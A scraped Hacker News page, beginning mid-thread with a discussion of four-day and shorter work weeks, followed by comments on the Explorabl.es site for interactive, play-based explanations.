Are you forgetting overtime? Back in '51 I suspect there may well have been more OT worked, and there would have been more factories back then.

chadlavi(4310) 4 days ago [-]

These numbers are across all industries, right? A 40-hour union job has certain parameters such that the work hours aren't going to shift much without larger political shifts within those orgs.

But I suspect the number of hours a non-union knowledge worker works per year has gone up in the same time frame.

decebalus1(10000) 4 days ago [-]

> Something felt fishy about their claim that number of hours worked has been climbing in the United States so I checked their source. It turns out that 'average annual hours worked' has changed from 1,780 in 2011 to 1,786 last year. This seems like barely a rounding error...

This is a classic case of statistics being used to prove a different point. Perhaps the average annual hours worked is pretty much the same, but the way work happens has changed, and that may be harder to quantify. For example, what if there are more part-time jobs and people hold 2-3 part-time jobs? Or how are the hours of the flexible-hours folks at Starbucks counted (flexible in the sense that someone else picks them, I mean, usually only at peak times)? Anecdotally, there's a guy I know who holds a full-time job selling insurance, then works afternoons for UPS for the health benefits. How is that reported in the 'average annual hours worked' figure?

It's the same as saying that unemployment went down and being happy about it. Because there are so many jobs, some people have 3 in order to pay rent.

tempestn(1530) 4 days ago [-]

Does this include part-time workers? If so, the slight increase since 2011 could just be a reflection of the lower unemployment and underemployment.

Actually even if it's only considering full-time employees, it could still be related to unemployment, since a tighter labor market would leave more positions unfilled, which would mean more overtime.

dcre(3185) 4 days ago [-]

The overall average per person has declined (though not really since the 80s). However, in the same time frame, the proportion of women in formal work went from 35% to 60% [1]. So the story for men and women looks very different. Note also that for women this is a shift from domestic labor to formal labor, so it's probably not much of an increase in hours worked even though it looks like that on paper. However, in the same time frame, I believe men spend a bit more time on housework than they used to, which is not included in formal hours worked.

The point of all this is simply that it is difficult to draw conclusions about labor market trends from average annual hours worked.

[1] https://fred.stlouisfed.org/series/LNS11300002

notJim(10000) 4 days ago [-]

I was curious for context on this, and honestly didn't find much in my brief search, but apparently it's thought that for professionals the hours worked have gone up, while for the working class they have gone down. I didn't research it, but I wonder if part of the explanation is that working-class people tend to be under-employed, and/or that government policies which kick in at, say, 30 hours/week (like the ACA, for example) push the numbers down. Professionals of course tend to be salaried, so you really want to squeeze as much out of them as you can.

zulgan(3652) 3 days ago [-]

I don't think it is possible to compare hours worked 100 years ago and now.

Now, especially for developers and office workers, work is almost indistinguishable from life.

For example there is barely any time while I am awake that I am not thinking about work. (sometimes even my dreams are about work related tech topics)

Not to mention that modern management techniques are deeply psychological, amounting to sophisticated propaganda.

TBH I don't think more work is being done; I just think the corporation organism consumes as much as it can.

askafriend(3131) 4 days ago [-]

I'd really like to do 4x10hrs versus 5x8hrs. I think that'd be a significant improvement for a lot of people.

wolco(3776) 4 days ago [-]

If you are trying to kill 40 hours, that works. But why not 14-14-12, or 20-20, where you take 4 hours from each day to get the 8 hours for sleep?

I remember going to an interview somewhere and during the summers they came in at 8:30am each day (instead of 9) so they could get off at 2:30pm on a Friday. That sounded like hell for no big gain.

We need to go down to 20 hours.

gordon_freeman(2608) 4 days ago [-]

I think stuffing 10 hours into a workday will bring a diminishing rate of productivity return during the last couple of hours.

qsymmachus(3933) 4 days ago [-]

Why not 4x8 hours?

Ididntdothis(4271) 4 days ago [-]

This is terrible if you have a long commute. During the 4 days you only commute, work and sleep. Now as a remote worker I could do this.

risyachka(10000) 3 days ago [-]

I bet you'd like 4x8 even more.

technofiend(10000) 4 days ago [-]

The great thing about 4x10s is that if employees are given the choice of Monday or Friday off, you suddenly have a 40% reduction in the time available for meetings where everyone must attend. It cuts down on wasted time, and frankly your fourth day is usually more lightly loaded, letting you get more actual work done.

ropiwqefjnpoa(10000) 4 days ago [-]

I did this (4x10) for about a year at a previous company, really enjoyed it.

The hardest part was coming back after the 3 day weekend, it always felt like coming back from vacation.

tasogare(10000) 4 days ago [-]

If we were on a 4-day week I would like to have Wednesday free instead of Friday.

gdubs(1582) 4 days ago [-]

When the 40 hour workweek was first proposed, doomsayers said it would be the end of the American economy. The opposite happened, and as injuries and illness decreased, productivity increased. [1]

Something to keep in mind, as it's counterintuitive and the instinct is to say, "that can never happen here", or, "it'll never work."

1: Robert Gordon, "The Rise and Fall of American Growth"

mortenjorck(1140) 4 days ago [-]

I'm genuinely impressed that the Overton window on hours seems to have changed since the last time the 4-day work week was in the headlines.

Not that long ago, it was unquestioned that four days meant 4x10. It was simply unthinkable that we would consider less than forty hours 'full time.' I even skipped this article initially, expecting it to have the same assumptions! And yet, they specifically report that Shake Shack cut back to 32 hours without cutting pay.

I would have expected service-sector jobs to be the last to see something like this. And if a burger chain can do it, an office where we spend 40 hours in a combination of productivity and reading HN can absolutely do it.

Ididntdothis(4271) 4 days ago [-]

It seems a lot of these experiments are a success. But after a while somebody gets greedy and thinks "we get good productivity at 32 hours. I wonder how much more we could get at 40 hours?" And soon you are back at the old schedule.

Something similar happened at my company. For once a project was ahead of schedule. So instead of concluding that the system worked well and continuing to work in a relaxed manner, management decided to "pull in" the deadline and suddenly the project was a death march again.

For some people it's hard to accept that relaxed people are productive. They want to see stress and overtime or they will think that people are underperforming.

toper-centage(10000) 4 days ago [-]

Is it not also the responsibility of employees to ask for that benefit? Especially developers have that leverage. We have the ability to change the whole job landscape.

ChrisMarshallNY(4319) 4 days ago [-]

I was a development manager for years, for a Japanese company.

The Japanese are type A++ (at least, in Tokyo). They are masters at applying stress across the Pacific.

As a manager, it was my job to insulate my team from the stress, and I often took the hit for telling my bosses that I wasn't going to push my people harder than they already were working.

It seemed to work out in the end. When they finally rolled up my team, I had been managing it for 25 years, and the person with the least seniority in my team had a decade with the company.

It's a whole different world, out there, now. I had a manager at a startup tell me that conventional management assumes that engineers will only stay at a company for 18 months, so they really pile on the stress.

I can't even imagine that. There were a lot of downsides to working with the corporation that I worked for, but they treated us all with a great deal of respect, and made it possible for me to keep valuable, senior-level C++ developers for decades, despite rather sub-optimal pay and a not-so-thrilling work environment.

kody(4281) 4 days ago [-]

I agree that it's hard for some people (managers) to see a relaxed, happy person and believe that they're also totally productive.

I don't blame them either; I feel like the image of overly-caffeinated, stressed-out people is embedded in our collective consciousness as representative of High Productivity, and our lizard brains can't seem to reconcile that with the data saying 'relaxed people who make enough money, are treated well, and have the freedom to live satisfactory lives outside the office will most probably be more productive, focused, and effective at work.'

NaOH(433) 4 days ago [-]

> For some people it's hard to accept that relaxed people are productive.

Just look at how U.S. culture treats service workers. We best be seated on time for our dinner reservation. No one should wait 15 minutes for their hotel check-in because housekeeping isn't done yet. Oh, and that coffee was ordered nearly 5 minutes ago. And the plumber was supposed to be here at 8.

Your concerns about greed extend well beyond worker productivity. It appears to be the logical extension of believing the individual is sacrosanct.

m3kw9(10000) 4 days ago [-]

It didn't happen when we got weekends, either: workaholics, or pressure, will have people working weekends anyway, so the 4-day week seems a moot point in that regard. The other issue that comes up later, once people get used to a 4-day work week, is that they eventually have chores that can't be done in a 3-day weekend. Sort of like the rule that if you give x amount of time for a task, you will likely use all of it.

AWildC182(10000) 4 days ago [-]

It's as if killing the golden goose is a tale as old as time...

burnte(4294) 4 days ago [-]

>we get good productivity at 32 hours. I wonder how much more we could get at 40 hours?

Usually 4 days a week means 4 ten hour days, not 4 eight hour days. Hence the phrase 'four tens'.

bumby(10000) 4 days ago [-]

Anecdotal, but I've experienced the opposite, where the greed seemed to come more from fellow employees than from managers. Five-day weeks meant breakfast breaks as soon as the group came in on Friday, long lunches, and people mentally checking out early. When we switched to shorter weeks this just shifted to Thursday. After productivity was hurting, management was met with a near-mutiny attitude at the thought of going back to 5-day weeks.

Point being, I think there's something to be said for company culture in making this work.

kosii(10000) 4 days ago [-]

I'm a software engineer, I started working 4 days/32 hours per week about a month ago, and I couldn't be happier :)

perfunctory(1637) 4 days ago [-]

I started working 4 days/32 hours I think about a decade ago. Never looked back.

ausbah(3900) 4 days ago [-]

'Natalie Nagele, co-founder and CEO of Wildbit, has heard from other leaders who say it didn't work for them. She says it fails when employees aren't motivated and where managers don't trust employees.'

I would muse that employees usually aren't motivated because they hate their working conditions, usually imposed by shitty managers / company cultures. Managers & companies may complain about 'unproductive' or 'unmotivated' employees as if it's some personal failing of their employees, but news flash: people aren't going to care unless they have a reason to care. If you want employees to enjoy their work and actually be motivated to some degree greater than the bare minimum, give them working conditions that they enjoy. Give them retirement benefits, fewer working hours, less micromanagement, more pay, remote working options, etc.

This is a problem that stems from crappy notions of how work cultures 'ought to be' in America, and can only be solved by destroying those notions and getting rid of the idea 'productivity above all else' in companies.

nathan_compton(4320) 3 days ago [-]

My superficial understanding of capitalism is that the only thing that motivates employees is money. If you want people to be more motivated, give them more money.

polishdude20(10000) 3 days ago [-]

Yeah, it's almost as if, when you have one hundred people, you have to ask: is everyone lazy, or are you the one causing the problem?

globular-toast(10000) 3 days ago [-]

Unfortunately some people are just lazy. At my job they introduced 10% time to be used for personal development, but it's been abundantly clear that most employees are simply taking it as holiday.

notjustanymike(10000) 4 days ago [-]

I introduced 'work from home Wednesday' at our company and the reduction in stress is palpable. Hell, I sleep better on Tuesday nights knowing I've got a day of silence lined up. The naysayers quickly fell in line too, once they realized how much more they could get done that day.

bananamerica(10000) 4 days ago [-]

Why Wednesday though?

david-gpu(4278) 4 days ago [-]

Working from home is still working. Working four days a week is entirely different.

kody(4281) 4 days ago [-]

I worked 4x10s when I worked for the Army and it was awesome. 3 day weekends take off so much pressure, and come Sunday night I was starting to feel the itch to get back into work rather than the dreadful feeling that I 'wasted' my weekend. The only work experience that was better than this was 100% flexibility to work remotely and/or flex hours.

So there's my anecdata for you :)

clSTophEjUdRanu(4315) 4 days ago [-]

I worked 9 hour days with every other Friday off and hated it.

stan_rogers(10000) 4 days ago [-]

My best schedule ever was also military, but it was 7-3-7-4: 7 8-hour 'afternoon shift' days, then 3 days off, then 7 8-hour 'day shift' days followed by 4 days off. The 3-day time off was Tuesday-Wednesday-Thursday, and the 4-day was Friday through Monday - and because you were getting off the early shift and going onto the late shift, it seemed like a longer break. Of course, that implies shift work and three crews for 16-hour/7 day coverage. (The 'graveyard shift' was a skeleton crew, and your turn would pop up every four months or so. Air force. It was basically for emergency landings for civil and allied aircraft and such, with some swabbing of the decks for busy work.) The work week was long, but there was plenty of time to get stuff done and to wind down. Hell, you could even cram in a weekend getaway without a lot of stress.

standardUser(10000) 4 days ago [-]

10 hours really seems extreme. I am certain that the vast majority of office workers could produce the same level of output at a 4x9 schedule as they do in a 5x8 or would in a 4x10.

And most would be profoundly happier people.

monknomo(10000) 4 days ago [-]

4x10s are tough for me, but the 5-4-9 plan (five 9-hour days one week, then three 9-hour days plus one 8-hour day the next week - basically alternating 3-day weekends) is pretty nice in my book.

mikkergp(10000) 4 days ago [-]

I don't know if I'm pro a 4-day work week (I'm personally not for it if it's 4x10 instead of 5x8).

But I'm reading the book [Peak Performance](https://www.amazon.com/Peak-Performance-Elevate-Burnout-Scie...) (highly recommended) and I generally think that companies should really encourage employees to work on the schedule that works best for them. (This is obviously harder for shift work, where the value comes from having a person in a chair at certain times.)

We have all these norms about 8 hour days, and 5 day weeks and not sleeping at work, and I think people should be given the freedom to work in the way that works best for them.

One norm I'm trying to get used to breaking right now is the one about 'sleeping at work'. I would be much more productive if I napped for 15 or so minutes twice a day. I know that when it comes to coding or writing I could get a ton done in a day of three or four clear, well-defined, rested 1-hour sessions. I could get much more done in those '3-4 hours' than in an '8-hour day' with meetings and other administrivia thrown in. I'd guess my optimal work week is somewhere around 26 hours, assuming the space between those 26 hours is spent resting, focusing, and getting ready to work hard during them.

Darkphibre(10000) 4 days ago [-]

> Nap time adds to productivity

Amen to this! I pushed for, and saw implemented, a dual nap room for our studio. It was used around the clock by people stretching, meditating, and napping. I found a huge productivity spike from taking 20 minutes out each day.

Then, we hired a bunch more people for the upcoming launch, and it was re-purposed into a storage room for old rack hardware (I pushed against this, but was told it was a temporarily unavoidable allocation of the space... meanwhile, the dedicated Lego room sits unused 38 hours a week). So we lost the nap room right as we entered our year of crunch.

Boggles the mind.

Ah well. Have an interesting read on recent research into the commonality of four (rather than two) chronotypes (which I'd used in laying out my position): https://www.sciencedirect.com/science/article/pii/S019188691...

timwaagh(10000) 4 days ago [-]

Honestly this would be pretty bad for singles who just want to hustle and make some money to afford plans later in life. I can see the appeal for families wanting to take some time off, but currently there are enough facilities for dad-days and the like (at least, where I am). Yes, you need to pay for those, as is only fair. If this becomes law I'd guess the 'solution' for a lot of people would be to take two jobs. Suddenly these plans don't look so amazing anymore.

deadbunny(4024) 4 days ago [-]

I don't follow your logic. If you're working 4x8 rather than 5x8 for the same pay (as discussed in the article) you are not losing any money and have another whole day to 'hustle'.

perfunctory(1637) 4 days ago [-]

In a world where no one is compelled to work more than four hours a day, every person possessed of scientific curiosity will be able to indulge it, and every painter will be able to paint without starving, however excellent his pictures may be. Young writers will not be obliged to draw attention to themselves by sensational pot-boilers, with a view to acquiring the economic independence needed for monumental works, for which, when the time at last comes, they will have lost the taste and capacity. Men who, in their professional work, have become interested in some phase of economics or government, will be able to develop their ideas without the academic detachment that makes the work of university economists often seem lacking in reality. Medical men will have the time to learn about the progress of medicine, teachers will not be exasperatedly struggling to teach by routine methods things which they learnt in their youth, which may, in the interval, have been proved to be untrue.

-- Bertrand Russell

http://www.zpub.com/notes/idle.html

jariel(4316) 4 days ago [-]

This is a funny kind of bubble quote, by someone who I think was out of touch with most people.

I believe most people would watch TV, play cards, play video games. This is what they already do with their spare time, there's no reason to believe there wouldn't be more of it.

It's amazing what a 'schedule' and 'working with others' and 'requirements' and 'deadlines' can do - it brings people to life and is probably the only way hard things get done.

For a certain kind of person, some free time would lead to a lot of exploration but for most people it would not.

hinkley(4219) 4 days ago [-]

Many of us work in spaces where servers are expected to be working and running 24/7. Yet our bosses still want every single employee to have butts in seats 9:00 am to 5 pm, 5 days a week and in the same time zone. Sometimes with a little guilt-tripping on the side for taking sick days and vacation.

Wouldn't we be better off with several shifts, 4 days a week, covering Monday through Saturday or even the entire week?

wolco(3776) 4 days ago [-]

Mature places have this with a global workforce.

Not so mature places put 9-5ers on call with a tiny bump in pay.

mjayhn(10000) 4 days ago [-]

I can't begin to explain how much less stress I encounter in day-to-day life having just one weekday to stay home. Just having a day to easily knock out chores between Jira issues (drop the car off at the dealer, sell something on craigslist, complete a house project, go to the dentist, meet the handyman, go to the bank, etc.) is so nice.

All of these things wind up on the back burner when I'm in the middle of high stress projects and forced to sit at a desk for 8-10 hours a day.

All that does is lead to more stress because now I'm falling behind on my life tasks and have to burn a weekend catching up when I should be able to spend that weekend de-stressing.

I know not everyone is as sapped for energy as I am after work; I hate that I'm this way. But after leaving work and sitting in an hour of traffic, my energy is just drained by the time I make it home. I have enough energy to feed myself and sometimes work out to maintain my health.

GordonS(467) 4 days ago [-]

Around 5 years back, I went from 5 days a week to 4, taking a 20% paycut in the process.

It was one of the best decisions I've ever made - it feels like I have so much more time for family, side projects and hobbies than I ever did before. And for reference, I work around 90% from home.

TBH, the company I work for has got a pretty good deal out of this, as I'm sure my productivity hasn't dropped at all. (It's a megacorp, so there is zero chance of negotiating back up to the equivalent of a 5-day salary.)

david-gpu(4278) 4 days ago [-]

> Just having a day to be able to easily knock out chores between Jira issues

This seems to conflate working from home with having time off. Is your employer paying you to work on that day or not?

I work four days a week (30 hours). On my days off, I do not work at all. On my days on, I do not do random house chores during office hours. That's what my employer and I agreed to, and I think it describes what most people understand as a four day workweek.

rverghese(10000) 4 days ago [-]

But doesn't this rely on everyone else working 5 days?

If everyone had a 4-day week, it would be just like the current weekend. You can't go to the bank or dentist, because they would also be off.

Perhaps you could get the same effect and quality of life by taking Sunday and Monday as your days off and working Saturday.

Eoan(4255) 4 days ago [-]

Obligatory link to a solution that would make working less not even deserve a news story: https://i.imgur.com/ia2s7AM.png

erik_landerholm(4017) 4 days ago [-]

Do you actually like your job? I don't mean any disrespect, but I've had jobs I don't really like, and I get where you are coming from. Right now, though, and at other times since I've had my own companies, 6-day work weeks at 10-12 hrs a day were not even an issue. I feel like if people go to 4-day work weeks, people who love their jobs and are willing to work 1.5 times as much or more will have a huge advantage over the long haul.

cortesoft(10000) 4 days ago [-]

It is an especially big deal for working parents... having a day when kids are at school/daycare to do chores and errands is huge... so many things are impossible to do when you are chasing kids around. I get way more done on a weekday home than a weekend.

systemtest(4000) 4 days ago [-]

I did it a bit differently. For 2020, working four days a week gives me 204 workable days per year. Working five days gives me 255 workable days per year.

What I do is work five days a week, and around June-July I take ten weeks off. I have the same number of working days per year with the same income, but it feels like a godsend to have a yearly sabbatical of over 2 months during the best weather of the year. It reminds me of being in school again with the long summer holidays.

If I ever have children, that means being with them for six weeks, fully dedicated to them.
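
A quick sanity check of those day counts (numbers as above; exact holiday counts vary by country):

    five_day, four_day = 255, 204       # workable days in 2020
    sabbatical_weeks = 10
    remaining = five_day - sabbatical_weeks * 5
    print(remaining)                    # -> 205, within a day of the 204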

axaxs(10000) 4 days ago [-]

Honestly, it just sounds like your job is too stressful. I work 5 days a week, sometimes more, but nobody bats an eye if I need to go somewhere 2 or 3 hours in the middle of the day. I much prefer this to 4 full time days. 5 days of less stress gives you more availability and more flexibility at the same time. I feel it's what we should really be striving for.

davidajackson(4225) 4 days ago [-]

This is why I recently started doing remote work. I just can't justify the commute and the time it takes to go somewhere 30+ minutes away.

bytematic(10000) 4 days ago [-]

It's interesting how many of those things rely on certain businesses being open 5 days a week at least.

volkk(4303) 4 days ago [-]

> I know not everyone is as sapped for energy as I am after work, but I leave work and sit in an hour of traffic. My energy is just sapped from me by the time I make it home. I have enough energy to feed myself and sometimes work out to maintain my health..

I know that some people just don't have the privilege of living close to their jobs, but after spending one internship getting up at 5:45am to drive with my dad for an hour to work to beat the traffic, and then spending 1.5-2 hours driving back in heavy NYC traffic, I vowed never to live in a place where I have to drive that far to get to work. 2 months of that and I was already losing my will to live. My dad did it for 15 years, and I can see why, towards the last leg of that job, he was bitter and angry on a daily basis. That is not a way to live.

Cyph0n(4264) 4 days ago [-]

I feel exactly the same when it comes to energy, even though I live ~10 mins from work...

As far as work schedule goes, my company/team is fairly flexible when it comes to WFH. However, I still operate in 'work mode' while at home, which makes it difficult to take care of chores, etc.

turk73(10000) 4 days ago [-]

I'd say most of us probably are. I am suffering from chronic overwork at this point. I'm thinking of just quitting and taking 6 mos. off and maybe never going back to tech at all. Dow 30 company, total fucking mess.

grappler(4300) 3 days ago [-]

Seconding this, especially for tasks that have to be done during normal business hours. If there's some issue I have that requires calling some customer service number, it often gets put off for days or even weeks before I manage to fit it in.

sky_rw(10000) 4 days ago [-]

I encourage everybody to work as little as possible, that way the competition for me is lower.

postsantum(4179) 4 days ago [-]

Many people optimize for life quality, they are not competing with you

ojbyrne(680) 3 days ago [-]

I feel like the "bosses" should work 4-day weeks. The rest of us would get more done on the 5th day than on the other 4 combined.

allset_(10000) 3 days ago [-]

This is the work from home day each week.

KoftaBob(4281) 4 days ago [-]

As another thing to try, how about making the "standard" workday 9-4 instead of 9-5? This way, it ends up being 3 hours of work, 1 hour of lunch, then another 3 hours of work.

It's more balanced, people get an extra hour in their day to spend on themselves, and it seems that for many people, the extra hour from 4-5 is relatively low productivity compared to the rest of the day anyway.

icedchai(4264) 4 days ago [-]

I think it's already that way in many places. You just have to pretend to work for the other hour or two.

amyjess(3259) 4 days ago [-]

Going down to a 32-hour workweek would be lovely, but I'm simply not interested in doing 4×10. I'd rather get home at a decent hour than have an extra day off.

gpanders(10000) 4 days ago [-]

I work from 7-5 each day, so even when I go to the gym or run a quick errand after work I can be home by 6, which strikes me as a 'decent hour', although I suppose that's subjective.

Waking up at 6am takes getting used to but isn't unreasonable in my opinion.

chadlavi(4310) 4 days ago [-]

As knowledge workers (I'm assuming), I feel strongly that the number of hours we spend at work has little correlation to the amount of value we deliver. I could easily get the same amount of value delivered in 4 7-hour days that I currently do in 5 8-ish hour ones. I'm only forced to hang out at work for a certain set of hours because of... tradition I guess?

echelon(4132) 4 days ago [-]

To each their own. My work week is spent on work and I can't really enjoy the time before or after work. I'll never enjoy M-F.

I'd rather have a 4x10 than a 5x8.

If my side hustle ever graduates into a startup and I start hiring other people, we're doing 4x10 or 4x9.

ClikeX(10000) 1 day ago [-]

4x10 would be fine by me if I lived 10 minutes from work. But I don't think my dog would appreciate being left without a walk for 12 hours.

On 32 hours now and I can handle it financially. As long as that stays the way it is I'm not changing anything.

tombert(4235) 4 days ago [-]

I remember when I interned at Lockheed Martin forever ago, they had a system where you normally worked 9-hour days (8 on Fridays), and as a result had every other Friday off. It equated to 80 hours every two weeks, and it was really nice if you ever had to go to the bank or DMV (which are typically only open on weekdays).

I always wondered why this wasn't more popular.
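
For the curious, the biweekly totals (plain arithmetic, nothing Lockheed-specific):

    nine_eighty = 8 * 9 + 1 * 8   # eight 9-hour days plus one 8-hour Friday
    baseline    = 10 * 8          # ten 8-hour days
    print(nine_eighty, baseline)  # -> 80 80, but with every other Friday off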

aetherson(3601) 4 days ago [-]

Popularly known as the 9-80 schedule. My wife has it, it's really nice to get the Friday off but it makes it rough for her to be at all involved in picking up/dropping off the kids (which is hard even with a normal 8 hour day).

hylaride(10000) 3 days ago [-]

In Canada I've seen this at large companies over the summers for white collar workers.

clSTophEjUdRanu(4315) 4 days ago [-]

Why is this so common in defense?

om42(10000) 4 days ago [-]

9/80 schedules are more popular in defense, at least from what I've seen. There are some unintended consequences (to me) of it. PTO/holidays can get weird: do you get 9 hours of paid time, or do you get 8 and shift your hours? It's mostly a problem when teams have a mix of systems and there isn't a standard.

When I was at LM a few years ago, some teams were on a different 9/80 pattern (different Fridays off), and some were still on the regular 10/80 schedule. So on Fridays you basically had significantly fewer people in the office, and it was never the person you needed to get work done. That basically made Monday to Thursday the regular working week, with Friday being there if you really needed to get work done.

I think the different schedules were a combination of LM employees, employees that were in the union, and external contractors having different contract requirements.

abecedarius(2123) 4 days ago [-]

I used to work 4 days during a contract job with a very long commute. I was made to stop because of a new state law requiring overtime pay on days over 8 hours. Thanks, Sacramento.

aaronchall(2460) 3 days ago [-]

I wonder what you'd say to the lawmakers who caused that change...

blobbers(10000) 4 days ago [-]

'Russian Prime Minister Dmitry Medvedev is backing a parliamentary proposal to shift to a four-day week.' -- with all the Russian meddling in the U.S.A., maybe they can get this pushed through!

Jokes aside, I would love this. Right now in tech, asking for this sort of thing feels like a 'career limiting move', and in a hiring situation it could definitely label you as 'not a hard worker', despite your emphasis on efficiency and productive hours.

blackearl(10000) 4 days ago [-]

If not career limiting, pay limiting. I'd worry that I'd suddenly get a 20% cut in salary.

k__(3390) 4 days ago [-]

I'm from Germany and none of my friends works 40h anymore.

They're all down to 50-80%.

This is even regulated by law: your employer has to allow you to reduce your working time; only in some extreme cases can they deny it.

Works like a charm.

sib(4146) 4 days ago [-]

Is there an English-language description of this law anywhere online? I couldn't find it and would love to learn more. Thanks!

frockington1(4294) 4 days ago [-]

I like the idea of working less, but it's going to be hard to use Germany as a poster child. The German economy hasn't been doing too great recently. In my opinion that's largely due to carrying lagging EU economies, but it will be hard to use a struggling economy as a positive indicator.

Germany: https://tradingeconomics.com/germany/gdp-growth US: https://tradingeconomics.com/united-states/gdp-growth

fogetti(4048) 4 days ago [-]

I am curious. Where do they work? What do they do?

kuu(4319) 4 days ago [-]

Do you also get paid 50-80%?

systemtest(4000) 4 days ago [-]

What about your pension or your company car? If you work an extra day in the week, 100% of that money can go straight to your pension, giving you 10 years of early retirement.





Historical Discussions: Explorabl.es (February 19, 2020: 886 points)
Explorable Explanations (September 18, 2018: 3 points)
The Explorable Explanation "Game" Jam Is ON (July 28, 2018: 2 points)
Explorable Explanations (August 20, 2018: 1 point)
The Explorables Jam (July 17, 2018: 1 point)
The Explorable Explanation "Game" Jam – explain an idea through play (July 09, 2018: 1 point)

(890) Explorabl.es

890 points 6 days ago by rickdeveloper in 4129th position

explorabl.es | comments | anchor

Lion cubs play-fight to learn social skills. Rats play to learn emotional skills. Monkeys play to learn cognitive skills. And yet, in the last century, we humans have convinced ourselves that play is useless, and learning is supposed to be boring.

Gosh, no wonder we're all so miserable.

Welcome to Explorable Explanations, a hub for learning through play! We're a disorganized "movement" of artists, coders & educators who want to reunite play and learning.

Let's get started! Check out these 3 random Explorables:




All Comments: [-] | anchor

lukifer(4318) 6 days ago [-]

Hah, was planning on linking to Nicky Case[0], but of course that's exactly who's behind this! :D

Very exciting project. We're absolutely 'leaving money on the table' by not leveraging the full power of the brain for education and reasoning about complex systems. See also: Bret Victor's 'Ladder of Abstraction' [1], and Kevin Simler's 'Going Critical' [2].

[0] https://ncase.me/

[1] http://worrydream.com/LadderOfAbstraction/

[2] https://meltingasphalt.com/going-critical/

hammerbrostime(3892) 6 days ago [-]

Nicky Case does incredible work. She should be a poster child for Patreon, through which I believe she makes most of her living. https://www.patreon.com/ncase

qqii(4230) 6 days ago [-]

Thank you for highlighting these examples, they've been very insightful.

ThouYS(4300) 5 days ago [-]

Hadn't heard of Case yet, but Bret Victor is an absolute visionary. His talks "Media for Thinking the Unthinkable" [1] and "The Humane Representation of Thought" [2] are eye-openers!

[1] https://vimeo.com/67076984

[2] https://vimeo.com/115154289

thomasfromcdnjs(2829) 6 days ago [-]

I read the fireflies tutorial and still don't understand how they sync their clocks. What does moving a second forward on the timer do?

zentiggr(10000) 4 days ago [-]

Take an example with only two fireflies. Their clocks won't be at the same point at first, of course.

So one lights up... and the instinct is for the other firefly to try and light up at the same time. How?

Since it was going to light up later than the first fly, it shortens its cycle a little bit and lights up a little sooner.

Repeat that cycle a few times and soon enough, the second fly has 'caught up' and is flashing when the first one does.

Add more fireflies, and it's just more of the same. When a nearby firefly lights up, the ones close by speed up a little. Eventually, they all converge on the 'fastest' time.
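
If it helps, here's a minimal simulation of that mechanism, assuming a fixed cycle length and a small forward "nudge" whenever a firefly sees a flash (the constants are invented for illustration; the actual explorable may use different rules):

    import random

    CYCLE = 100   # ticks in one flash cycle
    NUDGE = 5     # how much a laggard shortens its cycle per observed flash
    N = 10        # number of fireflies

    phases = [random.uniform(0, CYCLE) for _ in range(N)]

    def tick(phases):
        phases = [p + 1 for p in phases]             # every clock advances
        if any(p >= CYCLE for p in phases):          # somebody flashed
            # everyone who hasn't flashed yet jumps a little closer to flashing
            phases = [p if p >= CYCLE else p + NUDGE for p in phases]
        return [p - CYCLE if p >= CYCLE else p for p in phases]  # wrap the flashers

    for _ in range(5000):
        phases = tick(phases)

    print(sorted(round(p) for p in phases))   # phases bunch into tight groups

Run it a few times: the fireflies never agree on an absolute time, they just end up flashing together.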

dev_throw(10000) 6 days ago [-]

The notion that only serious work can educate someone is something I hope future educators can dispel by building engaging platforms (edutainment).

I learned about game theory, communication, teamwork, strategy and business from gaming and sports. These topics would have been quite dry to learn in a sterile educational setting. In the same vein, I hope we move to more experiment-based, hands-on learning of science and technology over rote learning, since a lot of learners hugely benefit from that.

I commend you on what you're working towards!

lonelappde(10000) 6 days ago [-]

Gaming and sports can be serious, and taking it seriously leads to big gains in learning.

I think you mean 'formal' or 'prim' more than 'serious'.

repsilat(4319) 5 days ago [-]

> The notion that only serious work can educate someone is something I hope future educators can dispel

This sounds super weird to me. I thought rote-learning was totally out of fashion, and now under-practiced because everyone thinks that learning should always be fun.

I don't know whether this is regional variation, age differences or political differences. And there's probably some middle ground: maybe you have to memorise your times-tables, but maybe it doesn't need to be boring.

michaelmior(3954) 6 days ago [-]

I haven't put any effort into adding explanations of anything, but looking at the one titled 'Basic Beats' reminded me of this little thing I built a while back for playing around with rhythms in a similar circular way: https://michaelmior.github.io/rhythm-wheel/

stazz1(4102) 6 days ago [-]

Very cool tool! Thanks a lot for linking it. I wonder what sort of sequencer you would build.

jwilber(10000) 5 days ago [-]

Not as explorable per se, but here's an interactive explanation I made for my favorite (and widely useful) method in statistics:

https://www.jwilber.me/permutationtest/
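
The gist, if you don't want to click through: pool both samples, reshuffle the group labels many times, and see how often a random relabeling produces a difference at least as extreme as the one observed. A minimal sketch, assuming a difference-in-means statistic (the data here is made up):

    import random

    def permutation_test(a, b, n_permutations=10_000):
        observed = sum(a) / len(a) - sum(b) / len(b)
        pooled = a + b
        hits = 0
        for _ in range(n_permutations):
            random.shuffle(pooled)                      # random relabeling
            pa, pb = pooled[:len(a)], pooled[len(a):]
            diff = sum(pa) / len(pa) - sum(pb) / len(pb)
            if abs(diff) >= abs(observed):
                hits += 1
        return hits / n_permutations                    # two-sided p-value

    treatment = [12.1, 14.3, 13.8, 15.0, 12.9]
    control   = [11.2, 12.0, 11.8, 13.1, 12.4]
    print(permutation_test(treatment, control))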

hencq(3521) 5 days ago [-]

Great explanation! I'm now tempted to try this out myself for some experiments. I wish my statistics book in college had used this kind of interactive explanation.

AKluge(10000) 6 days ago [-]

I also work in this space, producing interactive content for physics education. I have an evolving framework for visualizing vector fields, such as electric fields. Example content includes an explanation of Gauss's law http://www.vizitsolutions.com/portfolio/gausslaw/, where the graphs, texts, and equations are interactive, and changes to any of them are reflected in all of them.

A truly general framework will be tough, because of the different nature of different types of content. For example, even within physics I am working on a quantum simulation, where the simulation and interactions with it will be very different from the electric field examples. Perhaps for some very general interactions, eventually... I will definitely be evolving in that direction – for example making the electric field models easier to edit.

I have advocated this approach at a number of conferences, but the reception from companies has been lukewarm at best. They are able to sell content with limited interactivity, and the cost for this is comparatively high.

All of this content is founded in correctness and in research-proven instructional design principles, which do include gamification.

BTW, all of the code is openly licensed, and I encourage its reuse and solicit feedback on functionality and future directions.

TuringTest(3135) 5 days ago [-]

>A truly general framework will be tough, because of the different nature of different types of content.

I've been thinking for years about what it would take to create a general framework like that, and I think we're in the middle of a language revolution like the one in the 80's that will end up creating such a system; all the pieces are in place, it just needs one project to integrate the best parts and take off.

My ideal solution would integrate:

- the programming model of a spreadsheet (reactive functional programming), useful for building models (sketched in code below);

- interactive graphics like those in explorable explanations, integrated with the data models stored in the spreadsheet;

- a good templating library with a visual designer and auto-generated markup, for building visual components based on the models;

